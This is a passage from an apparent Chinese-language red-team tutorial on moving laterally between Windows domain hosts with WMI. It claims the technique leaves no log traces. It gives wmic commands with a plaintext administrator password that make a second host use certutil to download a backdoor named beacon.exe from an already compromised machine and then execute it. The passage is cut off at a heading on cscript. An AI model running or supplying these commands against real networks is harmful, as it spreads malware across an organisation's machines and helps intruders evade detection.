一、域横向移动-WMI-自带&命令&套件&插件
WMI
是通过
135
端口进行利用,支持用户名明文或者
hash
的方式进行认证,并且该方法不会在目标日志系统留下痕迹。
1.wmic
内部命令:(利用出网主机192.168.3.31上线后执行命令,密码明文传递通过验证,cmd命令执行)
以下命令在出网主机192.168.3.31上线后执行,无回显:
1、让主机192.168.3.32访问192.168.3.31构造的Web地址,下载后门至C盘
wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
2、使得主机192.168.3.32执行后门
wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe c:/beacon.exe"
2.cscript
内置:
(
交互式